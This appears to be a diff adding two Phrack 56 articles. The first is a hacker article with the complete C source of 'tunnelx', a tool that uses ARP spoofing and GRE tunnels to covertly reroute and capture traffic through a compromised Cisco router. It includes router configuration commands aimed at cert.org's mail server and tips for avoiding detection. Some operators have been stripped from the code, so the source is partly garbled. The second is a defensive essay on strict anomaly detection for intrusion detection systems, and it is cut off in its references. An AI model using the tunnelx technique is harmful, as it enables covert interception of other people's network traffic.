+|----------------- THINGS TO DO IN CISCOLAND WHEN YOU'RE DEAD ----------------|
+|-----------------------------------------------------------------------------|
+|-------------------------- gauis <gaius@hert.org> ---------------------------|
+
+
+v0.2 1/1/00
+
+
+----|  1.  Disclaimer
+
+Tunnelx (the code) is part of the research and development effort conducted by
+HERT (Hacker Emergency Response Team). It is not a production tool for either
+attack or defense within an information warfare setting.  Rather, it is a
+project demonstrating proof of concept.
+
+If you are not the intended recipient, or a person responsible for delivering
+it to the intended recipient, you are not authorized to and must not disclose,
+copy, distribute, or retain this message or any part of it.  Such unauthorized
+use may be unlawful.  If you have received this transmission in error, please
+email us immediately at hert@hert.org so that we can arrange for its return.
+
+The views expressed in this document are not necessarily the views of HERT.
+Its directors, officers or employees make no representation or accept any
+liability for its accuracy or completeness unless expressly stated to the
+contrary.
+
+
+----|  2.  Introduction
+
+When I think about routers in general, I feel exactly like I do when I go to
+the supermarket and see all this food and then I can't stop thinking of mad
+cow disease, CJD, GMO...  It makes me feel dizzy.  Just go on cisco.com and
+check what cisco 7500 is used for and how many corporations own them and how
+many thousands of machines get routed through them...  There is even a
+traceroute map somewhere that can give you an idea of how deeply dependant we
+are on these routers.  It's been a long time since I stopped believing in
+security, the core of the security problem is really because we are trusting
+trust (read Ken Thomson's article, reflections on trusting trust), if I did
+believe in security then I wouldn't be selling penetration tests.
+
+How many times have you heard people saying, "Hey I 0wn this cisco, it would be
+cool if I had IOS src...  I could trojan and recompile it and do this and
+that.", how many times have you heard of people wondering what the fuck they
+could do with an enable password.  The IOS src has been floating around for
+quite a while now and no-one'z done anything with it yet; at least not among
+the regular bugtraq letspretendtobefulldisclosure readers.
+
+Well you don't even really need the IOS src, everything you need is already
+there, (there is only one little thing that would be nice to have from the src
+but we'll talk about it below).  You can load up the image in IDA, nop out a
+couple of instructions and the cisco's rmon implementation won't zero the
+payload anymore and you have a IOS sniffer.
+
+  
+----|  3.  Rerouting demystified
+
+What you want to do is reroute some traffic from a router and send it to some
+other place, capture it and resend it to the router and make it look like
+nothing ever happened.  Normal operation on a typical config will look like
+this:
+
+          Internet  ------------ Cisco ------------ Target
+                               Ethernet0            Serial0
+
+
+
+  What we are going to do is:
+
+     # telnet cisco
+     Trying 192.168.1.240...
+     Connected to 192.168.1.240.
+     Escape character is '^]'.
+
+
+     User Access Verification
+
+     Password:
+     cisco> enable
+     Password:
+     cisco# configure term
+     Enter configuration commands, one per line.  End with CNTL/Z.
+     cisco(config)# int tunnel0
+     cisco(config-if)# ip address 192.168.0.1 255.255.255.0
+     cisco(config-if)# tunnel mode ?
+       aurp    AURP TunnelTalk AppleTalk encapsulation
+       cayman  Cayman TunnelTalk AppleTalk encapsulation
+       dvmrp   DVMRP multicast tunnel
+       eon     EON compatible CLNS tunnel
+       gre     generic route encapsulation protocol
+       ipip    IP over IP encapsulation
+       nos     IP over IP encapsulation (KA9Q/NOS compatible)
+
+     cisco(config-if)# tunnel mode gre ip
+     cisco(config-if)# tunnel source ?
+       A.B.C.D   ip address
+       BRI       ISDN Basic Rate Interface
+       Dialer    Dialer interface
+       Ethernet  IEEE 802.3
+       Lex       Lex interface
+       Loopback  Loopback interface
+       Null      Null interface
+       Tunnel    Tunnel interface
+     cisco(config-if)# tunnel source Ethernet0/0/0
+     cisco(config-if)# tunnel destination 192.168.1.1
+     cisco(config-if)# ^Z
+     cisco# show interfaces Tunnel0
+     Tunnel0 is up, line protocol is up
+       Hardware is Tunnel
+       Internet address is 192.168.0.1/24
+       MTU 1500 bytes, BW 9 Kbit, DLY 500000 usec, rely 255/255, load 1/255
+       Encapsulation TUNNEL, loopback not set, keepalive set (10 sec)
+       Tunnel source 192.168.1.240 (Ethernet0), destination 192.168.1.1
+       Tunnel protocol/transport GRE/IP, key disabled, sequencing disabled
+       Checksumming of packets disabled,  fast tunneling enabled
+       Last input never, output never, output hang never
+       Last clearing of "show interface" counters never
+       Input queue: 0/75/0 (size/max/drops); Total output drops: 0
+       5 minute input rate 0 bits/sec, 0 packets/sec
+       5 minute output rate 0 bits/sec, 0 packets/sec
+          0 packets input, 0 bytes, 0 no buffer
+          Received 0 broadcasts, 0 runts, 0 giants
+          0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
+          0 packets output, 0 bytes, 0 underruns
+          0 output errors, 0 collisions, 0 interface resets
+          0 output buffer failures, 0 output buffers swapped out
+     cisco#
+
+At that point tcpdump won't show any output unless you try to ping an IP on
+the 192.168.0.1/24 network.  You will see some GRE encapsulated ICMP packets
+and some icmp proto 47 unreach packet coming from 192.168.1.1.
+
+On your linux test box, make sure you have protocol number 47 unfirewalled,
+
+     test# ipchains -I input -p 47 -j ACCEPT          # accept GRE protocol
+     test# modprobe ip_gre
+     test# ip tunnel add tunnel0 mode gre remote 192.168.1.240 local
+     192.168.1.1
+     test# ifconfig tunnel0 192.168.0.2 netmask 255.255.255.0
+     test# ping 192.168.0.2
+     PING 192.168.0.2 (192.168.0.2): 56 data bytes
+     64 bytes from 192.168.0.2: icmp_seq=0 ttl=255 time=0.3 ms
+     ^C
+
+Ok our link is up.  And as you can see by default GRE is really stateless.
+There is no handshake, as we are not in Microsoft land with GRE2 and stupid
+PPTP.
+
+     test# tcpdump -i eth1 host 192.168.1.240 and not port 23
+     tcpdump: listening on eth1
+     11:04:44.092895 arp who-has cisco tell private-gw
+     11:04:44.094498 arp reply cisco is-at 0:6d:ea:db:e:ef
+     11:04:44.094528 192.168.0.2 > 192.168.0.1: icmp: echo request (gre encap)
+     11:04:44.097458 192.168.0.1 > 192.168.0.2: icmp: echo reply (gre encap)
+
+GRE's rfc isn't really verbose, and cisco coders are bashed in the linux GRE
+implementation source for not respecting their own RFC.
+
+Let's look at tcpdump src on ftp.ee.lbl.gov.  Tcpdump sources are nice;
+in the file print-gre.c we have most of the info we need to start coding
+tunnelx.
+
+
+----|  4.  tunnelx - IOS Transparent reroute and capture
+
+I initialized a new CVS tree with libpcap and libnet, some gre header ripped
+from tcpdump, reread pcap's manpage while eating some Chunky Monkey, took
+a glance at libnet's API doc and cleaned off the pizza bits and ice cream
+from my fingers and decided to code something really simple and see if it
+works:
+
+- We define an unused IP address we call REENTRY and a fake ethernet address to
+  avoid a protocol unreachable storm that we call ETHER_SPOOF.
+- We initialize libpcap and libnet and set up a pcap_loop.
+
+- Then we make a pcap handler, which look for IP packets matching the GRE
+  protocol which are going to the tunnel exit point address as well as ARP
+  request packets.
+
+- Our ARP parser bails out if it isn't a request for REENTRY or send a reply
+  with ETHER_SPOOF.
+
+- Our GRE parser simply swaps IP and ether source and destitution, and
+  writes the packet to disk with pcap_dump(), increase the ttl, recompute
+  the checksum and flush it with libnet_write.
+
+- That's it!!!  Never would have believed it would have been so simple.  Now
+  comes the tricky part;  we have to configure the cisco correctly (define an
+  access list with all the stuff you want to reroute in it).
+
+
+     telnet 192.88.115.98
+     ...
+
+     config term
+     int tunnel0
+       ip address 192.168.0.1 255.255.255.0
+         tunnel mode gre ip
+         tunnel source Ethernet0
+         tunnel destination TUNNELX_REENTRY_IP
+     !
+     access-list 111 permit tcp any host 192.88.209.10 25
+     !
+     route-map certisowned
+       match ip address 111
+       set ip next-hop 192.168.0.7
+     !
+     !
+     interface Ethernet0
+       description to cert.org
+       ip address 192.88.115.98
+       ip policy route-map certisowned
+     ^Z
+
+
+If you had tunnelx up and running before setting up the cisco config then it
+should work now!!!  And traceroute doesn't show any thing since its packets
+are not matched by our access list!
+
+BEWARE, however, when you want to disable the cisco configuration.  Remove the
+route map first with 'no route-map certisowned' *before* the access list
+otherwise it will match all packets and they will go in an endless loop.  Try
+it on a small cisco 1600 before going in the wild with this stuff.  Also try
+not to be far away from the cisco.  People can only know on which network
+packets are captured not the actual host since we are arp spoofing, so take
+advantage of that.
+
+I said in the intro that some bits from IOS src would be nice to use, it
+is their crypto code.  You can setup an encrypted tunnel, make it use the
+same key on both way so it will encrypt outgoing packets and decrypt them when
+they come back.  Tunnelx is just the same.  You just need to add the crypto
+routine in your pcap reader to make it decrypt the traffic.
+
+Oh yes, I didn't talk about the pcap reader, you can just make a small program
+that parses the pcap dump from tunnelx, make it un-encapsulate the GRE packet,
+and create files for each session. lseek() is the key to do it without missing
+out of order packets or getting messed up by duplicates.  Since this article
+is not destined for the average bugtraq or rootshell reader, the pcap dump
+parser isn't included, you can send me some cash if you need a special version
+of tunnelx or need technical support.
+
+----|  5.  Greeting and final words
+
+:r !cat greetlist |sort -u |sed -e 's/$/, /'|xargs #hax idlers, acpizer,
+akg, antilove (your piggy coding style is great), awr, binf, cb, cisco9,
+ee.lbl.gov, f1ex, gamma, ice, jarvis, joey, kil3r, klog, meta, minus, nises,
+octa, plaguez, plasmoid, route (thx 4 libnet), scalp, scuzzy, shok, swr,
+teso crew, the owl, tmoggie, ultor, wilkins, ze others i forgot,
+
+I am already working on a new version that will let you do spoofing,
+hijacking, and monitoring like in hunt...  Don't forget you're on the router,
+you can do everything, and everyone trusts you :).
+
+
+----|  6.  The code
+<++> p56/Tunnelx/tunnelx.c !0d503a37
+// Tunnelx is part of the research and development effort
+// conducted by HERT. These are not production tools for either attack or
+// defense within an information warfare setting. Rather, they are small
+// modifications demonstrating proof of concept.
+// comments and crap to gaius@hert.org
+
+// to compile on solaris: (i used libnet-0.99g)
+// gcc -O2 -I. -DLIBNET_BIG_ENDIAN -Wall -c tunnelx.c 
+// gcc -O2 tunnelx.o -o tunnelx -lsocket -lnsl libpcap.a libnet.a
+// on linux:
+// gcc -O2 -I. `libnet-config --defines` -c tunnelx.c
+// gcc -O2  tunnelx.o -o tunnelx  libpcap.a libnet.a
+
+  #if (HAVE_CONFIG_H)
+  #include "config.h"
+  #endif
+  #include <libnet.h>
+  #include <pcap.h>
+
+  #define IP_UCHAR_COMP(x, y) \
+      (x[0] == y[0] && x[1] == y[1] && x[2] == y[2] && x[3] == y[3])
+
+  #define GRE_CP          0x8000  /* Checksum Present */
+  #define GRE_RP          0x4000  /* Routing Present */
+  #define GRE_KP          0x2000  /* Key Present */
+  #define GRE_SP          0x1000  /* Sequence Present */
+  #define GRE_SIZE (20)
+  #define GREPROTO_IP     0x0800
+  #define EXTRACT_16BITS(p) \
+          ((u_short)ntohs(*(u_short *)(p)))
+
+  const u_char *packetp;
+  const u_char *snapend;
+
+  #define SNAPLEN 8192
+  #define TUNNELX_REENTRY "192.168.1.1"
+  char out[] = "core";
+  u_long ip_spoof;
+  u_char ether_spoof[6] = {0xEA, 0x1A, 0xDE, 0xAD, 0xBE, 0xEF};
+
+  struct gre_hdr
+  {
+    u_short flags;
+    u_short proto;
+    union
+    {
+      struct gre_ckof
+      {
+        u_short cksum;
+        u_short offset;
+      }
+      gre_ckof;
+      u_long key;
+      u_long seq;
+    }
+    gre_void1;
+    union
+    {
+      u_long key;
+      u_long seq;
+      u_long routing;
+    }
+    gre_void2;
+    union
+    {
+      u_long seq;
+      u_long routing;
+    }
+    gre_void3;
+    union
+    {
+      u_long routing;
+    }
+    gre_void4;
+  };
+
+  struct link_int *li;
+  char default_dev[] = "le0";
+  char *device = NULL;
+
+  void pcap_print (u_char * user, const struct pcap_pkthdr *h,
+                   const u_char * p);
+  char errbuf[256];
+
+  int
+  main (int argc, char *argv[])  
+  {
+    int cnt, c, ret, snaplen;
+    bpf_u_int32 localnet, netmask;
+    char ebuf[PCAP_ERRBUF_SIZE];
+    char pcapexp[50];
+    pcap_t *pd;
+    struct bpf_program fcode;
+    pcap_handler printer;  
+    u_char *pcap_userdata;
+
+    snaplen = SNAPLEN;
+    printer = pcap_print;
+
+    while ((c = getopt (argc, argv, "i:")) != EOF)
+    {
+      switch (c)
+      {
+      case 'i':
+        device = optarg;
+        break;
+      default:
+        exit (EXIT_FAILURE);
+      }
+    }
+
+    //inet_aton (TUNNELX_REENTRY, \_spoof);
+    ip_spoof = libnet_name_resolve(TUNNELX_REENTRY, 0);
+    device = default_dev;
+    if (!device)
+    {
+      fprintf (stderr, "Specify a device\n");
+      exit (EXIT_FAILURE);
+    }
+
+    li = libnet_open_link_interface (device, errbuf);
+    if (!li)
+    {
+      fprintf (stderr, "libnet_open_link_interface: %s\n", errbuf);
+      exit (EXIT_FAILURE);
+    }
+    if (device == NULL)
+      device = pcap_lookupdev (ebuf);
+    if (device == NULL)
+      printf ("%s", ebuf);
+
+    pd = pcap_open_live (device, snaplen, 1, 500, errbuf);
+    if (pd == NULL)
+    {
+      fprintf (stderr, "pcap_open_live: %s\n", errbuf);
+      return (-1);
+    }
+    if (pd == NULL)
+      printf ("%s", ebuf);
+    ret = pcap_snapshot (pd);
+    if (snaplen < ret)
+    {
+      printf ("Snaplen raised from %d to %d\n", snaplen, ret);
+      snaplen = ret;
+    }
+    if (pcap_lookupnet (device, , , ebuf) < 0)
+    {
+      localnet = 0;
+      netmask = 0;
+    }
+    sprintf(pcapexp, "arp or (host %s and proto 47)", TUNNELX_REENTRY);
+    if (pcap_compile (pd,
+                      ,
+                      pcapexp,
+                      1, netmask) < 0)
+      printf ("%s", pcap_geterr (pd));
+
+    if (pcap_setfilter (pd, ) < 0)
+      printf ("%s", pcap_geterr (pd));
+    if (out)
+    {
+      pcap_dumper_t *p = pcap_dump_open (pd, out);
+      pcap_userdata = (u_char *) p;
+    }
+
+    if (pcap_loop (pd, cnt, printer, pcap_userdata) < 0)
+    {
+      (void) fprintf (stderr, "pcap_loop: %s\n", pcap_geterr (pd));
+      exit (1);
+    }
+    pcap_close (pd);
+    exit (0);
+  }
+
+  void
+  pcap_print (u_char * user, const struct pcap_pkthdr *h, const u_char * p)
+  {
+    register struct libnet_ethernet_hdr *eh;
+    register struct gre_hdr *gh;
+    register struct libnet_ip_hdr *ih;
+    register struct libnet_arp_hdr *ah;
+    register char *dst, *src;
+    register u_int ih_length, payload_length, off;
+    u_int length = h->len;
+    u_int caplen = h->caplen;
+    u_short proto;
+    struct ether_addr tmp_ea;
+
+    packetp = p;
+    snapend = p + caplen;
+
+    eh = (struct libnet_ethernet_hdr *) p;
+    p += sizeof (struct libnet_ethernet_hdr);
+    caplen -= sizeof (struct libnet_ethernet_hdr);
+    length -= sizeof (struct libnet_ethernet_hdr);
+
+    switch (ntohs (eh->ether_type))
+    {
+    case ETHERTYPE_IP:
+      ih = (struct libnet_ip_hdr *) p;
+      ih_length = ih->ip_hl * 4;
+      payload_length = ntohs (ih->ip_len);
+      payload_length -= ih_length;
+      off = ntohs (ih->ip_off);
+      if ((off & 0x1fff) == 0)
+      {
+        p = (u_char *) ih + ih_length;
+        src = strdup (inet_ntoa (ih->ip_src));
+        dst = strdup (inet_ntoa (ih->ip_dst));
+        switch (ih->ip_p)
+        {
+  #ifndef IPPROTO_GRE
+  #define IPPROTO_GRE 47
+  #endif
+        case IPPROTO_GRE:
+          gh = (struct gre_hdr *) p;
+          p += 4;
+          if (memcmp (>ip_dst, _spoof, 4) == 0)
+          {
+            // reverse GRE source and destination
+            memcpy (tmp_ea.ether_addr_octet, >ip_src, 4);
+            memcpy (>ip_src, >ip_dst, 4);
+            memcpy (>ip_dst, tmp_ea.ether_addr_octet, 4);
+            // ih->ip_id++;
+            // reverse Ether source and destination
+            memcpy (tmp_ea.ether_addr_octet, eh->ether_shost, ETHER_ADDR_LEN);
+            memcpy (eh->ether_shost, eh->ether_dhost, ETHER_ADDR_LEN);
+            memcpy (eh->ether_dhost, tmp_ea.ether_addr_octet, ETHER_ADDR_LEN);
+            // dope the ttl up
+            ih->ip_ttl = 64;
+            if (libnet_do_checksum ((u_char *) ih, IPPROTO_IP, ih_length) == -1)
+              return;
+
+            if (libnet_write_link_layer (li, device, (u_char *) eh,
+             payload_length + ih_length + sizeof (struct libnet_ethernet_hdr))
+                == -1)
+                return;
+            pcap_dump (user, h, packetp);
+          }
+          proto = EXTRACT_16BITS (>proto);
+          break;
+        default:
+          return;
+        }
+      }
+      break;
+    case ETHERTYPE_ARP:
+      // process arp
+      ah = (struct libnet_arp_hdr *) p;
+      if (EXTRACT_16BITS (>ar_op) != ARPOP_REQUEST)
+      {
+        return;
+      }
+      if (memcmp (ah->ar_tpa, _spoof, 4) != 0)
+        return;
+      // swap ip source and address i use ar_tha as a temporary place holder
+      memcpy (ah->ar_tha, ah->ar_spa, 4);
+      memcpy (ah->ar_spa, ah->ar_tpa, 4);
+      memcpy (ah->ar_tpa, ah->ar_tha, 4);
+      // move ether addr source to both destination
+      memcpy (eh->ether_dhost, eh->ether_shost, ETHER_ADDR_LEN);
+      memcpy (ah->ar_tha, eh->ether_shost, ETHER_ADDR_LEN);
+      // copy fake ether addr to both source
+      memcpy (eh->ether_shost, ether_spoof, ETHER_ADDR_LEN);
+      memcpy (ah->ar_sha, ether_spoof, ETHER_ADDR_LEN);
+      // set arp op code to reply
+      ah->ar_op = htons (2);
+      if (libnet_write_link_layer (li, device, (u_char *) eh,
+                                   ARP_H + ETH_H) == -1)
+        return;
+      break;
+    }
+  }
+<-->
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/11.txt b/phrack56/11.txt
new file mode 100644
index 0000000..622b671
--- /dev/null
+++ b/phrack56/11.txt
@@ -0,0 +1,401 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0b[0x10]
+
+|----------------- A STRICT ANOMOLY DETECTION MODEL FOR IDS ------------------|
+|-----------------------------------------------------------------------------|
+|------------------------------ sasha / beetle -------------------------------|
+
+
+"The three main problems we try to solve to achieve security are: hiding data,
+ ensuring that systems run effectively, and keeping data from being modified
+ or destroyed.  In fact you could argue that most of computer security - more
+ so than any other field in computer science - is simply the analysis of
+ imperfection in these areas.  Imperfection rather than perfection, because
+ people seem to have a tendency to find what they seek;  and (for the secular)
+ finding insecurity (e.g. imperfections), alas, is nearly always more correct
+ than stumbling upon security (e.g. perfection).  Obviously computers are
+ indefatigable, not invulnerable."
+
+     - Dan Farmer
+
+"Central to this type of thinking is the underlying notion of 'truth'.  By
+ means of argument which maneuvers matter into a contradictory position,
+ something can be shown to be false.  Even if something is not completely
+ false, the garbage has to be chipped away by the skilled exercise of
+ critical thinking in order to lay bare the contained truth."
+
+     - Edward De Bono
+
+
+----|  1. Introduction
+
+IDS (Intrusion Detection Systems) seem to currently be one of the most
+fashionable computer security technologies.
+
+The goal of IDS technology - to detect misuse, must be considered a genuinely
+'hard problem', and indeed there exists several areas of difficulty associated
+with implementing an NIDS (network-based IDS) such that the results it
+generates are genuinely useful, and can also be trusted.
+
+This article focuses predominantly on issues associated with NIDS although
+many of the issues are equally applicable to host-based and application-based
+IDS also.
+
+This article is split into two;  firstly, issues of concern regarding NIDS are
+discussed - generally one or more research papers are referenced and then the
+implication for the validity of current NIDS implementation models is
+presented;  secondly, a proposal for a new implementation model for NIDS is
+described which attempts to mitigate some of the identified problems.
+
+
+----|  2. Issues of Concern for NIDS
+
+
+2.1  False Alarm Rate
+
+"If you call everything with a large red nose a clown, you'll spot all the
+ clowns, but also Santa's reindeer, Rudolph, and vice versa."
+
+    - Stefan Axelsson
+
+At the RAID 99 Conference (Recent Advances in Intrusion Detection) [1],
+Stefan Axelsson presented his white paper:  'The Base-Rate Fallacy and its
+Implications for the Difficulty of Intrusion Detection' [2].
+
+The base-rate fallacy is one of the cornerstones of Bayesian statistics,
+stemming from Bayes theorem that describes the relationship between a
+conditional probability and its opposite, i.e. with the condition transposed.
+
+The base-rate fallacy is best described through example.  Suppose that your
+doctor performs a test on you that is 99% accurate, i.e. when the test was
+administered to a test population all of whom had the disease, 99% of the
+tests indicated disease, and likewise when the test population was known to be
+100% free of the disease, 99% of the test results were negative.  Upon
+visiting your doctor to learn the results he tells you that you have tested
+positive for the disease;  the good news however, is that out of the entire
+population the rate of incidence is only 1/10,000, i.e. only one in 10,000
+people have the disease.  What, given this information, is the probability of
+you having the disease?
+
+Even though the test is 99% certain, your chance of actually having the
+disease is only 1/100 because the population of healthy people is much larger
+than the population with the disease.
+
+This result often surprise a lot of people, and it is this phenomenon - that
+humans in general do not take the basic rate of incidence (the base-rate) into
+account when intuitively solving such problems of probability, that is aptly
+named "the base rate fallacy".
+
+The implication, is that intrusion detection in a realistic setting is
+therefore harder than previously thought.  This is due to the base-rate
+fallacy problem, because of which the factor limiting the performance of an
+intrusion detection system is not the ability to correctly identify
+intrusions, but rather its ability to suppress false alarms.
+
+
+2.2  Anomalous Network Behavior
+
+In 1993, Steven Bellovin published the classic white paper 'Packets Found on
+an Internet' [3], in which he describes anomalous network traffic detected at
+the AT&T firewall.  He identifies anomalous broadcast traffic, requests to
+connect to "inexplicable" ports, and packets addresses to random, non-existent
+machines.  Bellovin concludes:
+
+"To some, our observations can be summarized succinctly as 'bugs happen'.  But
+ dismissing our results so cavalierly misses the point.  Yes, bugs happen but
+ the very success of the Internet makes some bugs invisible;  the underlying
+ problems they are symptomatic of have not gone away."
+
+As the techniques for network information gathering (host, service, and
+network topology detection - see [4]) become more esoteric, they stray
+increasingly into the 'gray areas', the ambiguities, of the TCP/IP network
+protocol definitions (consequently, the results of such techniques may be more
+stealthy, but they are often also less dependable).
+
+These same ambiguities in the definition of the protocols result in TCP/IP
+stack implementations that behave differently per OS type, or even per OS
+release (in fact, this enables TCP/IP stack fingerprinting [5]).
+
+The implication, is that the detection of anomalous behavior which may have a
+security implication, is made considerably more complex since anomalous
+behavior exists in the network environment by default.
+
+
+2.3  Complexity
+
+"Thinking in terms of 'typical' is a lethal pitfall.  But how else do we
+ develop intuition and understanding?"
+
+    - Vern Paxson
+
+In 1999, Vern Paxson (author of the 'Bro' NIDS [6]), published a presentation
+titled 'Why Understanding Anything About The Internet Is Painfully Hard' [7].
+
+In his presentation, he concludes that to even begin to enable network traffic
+modeling, invariants are required:  properties of the network which do not
+change;  but, the Internet is by it's very nature a sea of change - a moving
+target.
+
+The majority of NIDS utilize a 'misuse-detection' model - traditionally
+implemented by comparing live network traffic to a database of signatures
+which represent known attacks.  A second NIDS model also exists:
+'anomaly-detection' - in which an IDS attempts to 'learn' to differentiate
+between legal and illegal behavior;  anomaly-detection NIDS have not yet been
+proven, and exist at present largely only in the academic research domain.
+
+Vern Paxson describes the Internet as:  "ubiquitous diversity and change:
+over time, across sites, how the network is used, and by whom", and this
+implies that much work is yet to be done before NIDS which attempt to utilize
+a traditional anomaly-detection model can add significant value in a complex,
+real-world, enterprise environment.
+
+
+2.4  Susceptibility to Attack
+
+In 1998, Thomas Ptacek and Timothy Newsham published their seminal work on
+NIDS subversion - 'Insertion, Evasion, and Denial of Service:  Eluding Network
+Intrusion Detection' [8];  an implementation followed in P54-10 [9], and the
+scripting language originally used by Ptacek and Newsham to perform their
+testing is also now available [10].
+
+Since then, anti-IDS techniques have been built into network interrogation
+tools, such as whisker [11].
+
+A presentation by Vern Paxson - 'Defending Against NIDS Evasion using Traffic
+Normalizers' [12] describes a 'bump in the wire' network traffic normalizer
+which defeats the majority of published NIDS subversion attacks.
+
+However, until Cisco implement this technology in IOS or Checkpoint do
+likewise with FW-1, etc., both unlikely prospects in the short to medium term,
+the implication is that this suite of NIDS subversion techniques will continue
+to call into question the reliability of NIDS.
+
+
+2.5  The Evolving Network Infrastructure
+
+The physical network infrastructure is rapidly evolving;  in the future -
+encryption, high wire speeds, and switched networks will practically kill
+those NIDS which utilize promiscuous-mode passive protocol analysis.
+
+When (...or if) the IP security protocol [13] becomes ubiquitous, NIDS will
+be unable to perform pattern-matching-style signature analysis against the
+data portion of network packets;  those NIDS signatures which relate to IP,
+TCP, and other protocol headers will still be valid, but signatures for
+attacks against applications will become useless because the application data
+will be encrypted.
+
+Current NIDS based upon passive protocol analysis can barely monitor 100 Mb/s
+Ethernet, and it is somewhat doubtful that they will be able to monitor ATM,
+FDDI, etc.
+
+Lastly, the increasing use of switches in the modern network environment
+largely foils the monitoring of multiple hosts concurrently (such as with
+broadcast Ethernet).  The use of a spanning/spy port to monitor multiple ports
+on a switch should be viewed as a short-term novelty at best.
+
+
+----|  3. The Evolution of NIDS
+
+In an attempt to 'evolve around' the described issues, vendors of NIDS
+products are moving towards a model in which an NIDS agent is installed on
+each host - monitoring network traffic addressed to that host alone (i.e. non
+promiscuously);  this would seem to be the most sensible way to perform NIDS
+monitoring in switched environments.  Also, if a host-based NIDS agent can be
+'built into' the hosts TCP/IP stack, it can perform security analysis both
+before data enters the stack (i.e. between the NIC and the stack), and before
+it enters an application (i.e. between the stack and the application),
+thereby hypothetically protecting both the OS stack and the application.
+
+In a multiple host-based model as described above, NIDS subterfuge attacks
+(section 2.4) are much less dangerous, since a host-based NIDS agent receives
+all the packets addressed to the host on which it is installed;  issues
+associated with the ambiguity in interpreting network traffic, such as with
+forward or backwards fragmentation reassembly (and so on) are reduced -
+assuming of course that the NIDS agent has visibility into the operation of
+the host OS stack.
+
+A transition from network-based NIDS to host-based NIDS is a logical
+evolutionary step - it eases the problems with susceptibility to attack and
+the underlying evolving network infrastructure, but it is not, however, a
+panacea for the other issues identified.
+
+
+----|  4. A Proposal:  Strict Anomaly Detection
+
+We approached the task of inventing a new NIDS operational model with two
+axiomatic beliefs:
+
+Firstly, an IDS should not view the task of detecting misuse as a binary
+decision problem, i.e. "saw an attack" vs. "did not see an attack".  It should
+be recognized that different forms of attack technique are not equally complex
+and consequently not equally complex to detect;  succinctly, the intrusion
+detection problem is not a binary (discrete), but rather an n-valued
+(variable) problem.
+
+Secondly, NIDS can detect many simplistic attacks, but those same simplistic
+attacks can be made much harder to detect if the correct delivery mechanism
+and philosophy is employed.  Many attack techniques are increasingly dependent
+on ambiguity, which forces an IDS to use much more simplistic logic if it is
+to perform correctly.  By definition, NIDS which employ a misuse detection
+heuristic cannot detect new, novel attacks;  more crucially, a small variation
+in the form/structure of an attack can often easily invalidate a NIDS
+signature.
+
+Our proposal, is that an IDS should not function by using definitions of
+misuse (signatures) to detect attacks, but instead by searching for deviation
+from a rigid definition of use.  We call this model "not use" detection, or
+alternatively "strict anomaly detection".
+
+It is important to distinguish between misuse-detection and "not use"
+detection:  traditional misuse detection involves defining a set of events
+(signatures) that represent attacks - "misuse", and attempting to detect that
+activity in the environment.  Strict anomaly detection ("not use" detection)
+involves defining a set of permitted events - "use", and detecting activity
+which represents exceptions to those events, hence "not use".
+
+The key advantage in employing a strict anomaly detection model is that the
+number of attacks within the "misuse" set can never be greater than the number
+of attacks within the "not use" set;  by definition, all current and future
+attacks reside in the "not use" set!
+
+Assuming a host-based model, the remaining current issues of concern with IDS
+identified in section 2, are:
+
+
+4.1  False Alarm Rate
+
+An IDS which implements a strict anomaly detection model can never enter a
+false-positive state, i.e. can never generate a false alarm, because activity
+which occurs outside the definition of "use", by definition, has security
+relevance.
+
+
+4.2  Anomalous Network Behaviour
+
+We must assume that anomalous behavior exists in the target environment by
+default;  therefore, a mechanism must exist to create 'exceptions' to the rule
+set used to implement strict anomaly detection within an IDS, for example -
+to except (accept) the idiosyncratic behavior of a particular flavor of host
+TCP/IP stack.  Such a system would be analogous in functionality to the
+ability to except certain instances of mis-configuration detected by
+host-based security state monitoring software.
+
+
+4.3  Complexity
+
+The use of strict anomaly detection does not necessarily require a complete
+model of acceptable use to be constructed - a subset may be acceptable.  For
+example, to detect novel network attacks that involve TCP connection
+establishment, the acceptable use model could initially simply comprise the
+three-way TCP connection handshake, plus termination conditions;  it may not
+be necessary to construct an acceptable use model which comprises the entire
+TCP state transition diagram.
+
+How can strict anomaly detection be applied to the problem of detecting
+anomalous (i.e. security relevant) network traffic?  We present two initial
+implementation ideas, below.
+
+Firstly, the TCP state-transition diagram could be modeled within an IDS as a
+set of rules;  these rules represent the valid use of TCP as per the TCP
+specification.  Exceptions (i.e. "not use") which occur would be alerted
+upon.  Some analysis has already been done on exceptions which occur to the 
+classical TCP state transition diagram, see [14].
+
+Alternatively, an entirely stateless approach could be taken by defining the
+allowable variation in each field of the TCP header and in its
+construction/format;  analysis could then be performed without reference to
+previous or future network traffic.  Exceptions which occur would be flagged.
+
+A more broad example of strict anomaly detection is in the scenario in which a
+NIDS is deployed on the 'inside' of a firewall;  the "not use" set can be
+constructed using the inverse of the firewall rule set.  If the NIDS detects
+traffic which it knows the firewall should reject, an alert would be
+generated.
+
+
+----|  5. Summary
+
+The difficulty in constructing an IDS which utilizes a strict anomaly
+detection model, is in being able to define allowable "use".  It may be that
+strict anomaly detection is best employed in an environment in which "use" can
+be (or is already) well defined, such as in the firewall example above, or in
+a 'trusted system' - such as Trusted Solaris [15] for example.
+
+In this article we have introduced the concept of strict anomaly detection,
+a.k.a "not use" detection.  Strict anomaly detection is an alternative to
+misuse-detection and anomaly-detection for the attack detection heuristic
+component of intrusion detection systems, which attempts to negate some of
+the critical issues of concern with the existing approaches to IDS.
+
+
+----|  6. References
+
+   [1]  International Workshop on Recent Advances in Intrusion Detection
+        http://www.zurich.ibm.com/pub/Other/RAID
+
+   [2]  The Base-Rate Fallacy and its Implications for the Difficulty of
+        Intrusion Detection, Stefan Axelsson, Proceedings of the 6th ACM
+        Conference on Computer and Communications Security, November 1-4,
+        1999
+
+   [3]  Packets Found on an Internet, Steven M. Bellovin, August 23, 1993,
+        Computer Communications Review, July 1993, Vol. 23, No. 3, pp. 26-31,
+        http://www.research.att.com/~smb/papers/packets.ps
+
+   [4]  Distributed Metastasis: A Computer Network Penetration Methodology,
+        Andrew J. Stewart, Phrack Magazine, Vol 9, Issue 55, File 16 of 19.
+        09.09.99, http://www.phrack.com/search.phtml?view&article=p55-16
+
+   [5]  Remote OS detection via TCP/IP Stack Fingerprinting', Fyodor, Phrack
+        Magazine, Volume 8, Issue 54, Article 09 of 12, Dec 25th, 1998,
+        http://www.phrack.com/search.phtml?view&article=p54-9
+
+   [6]  Bro: A System for Detecting Network Intruders in Real-Time, Vern
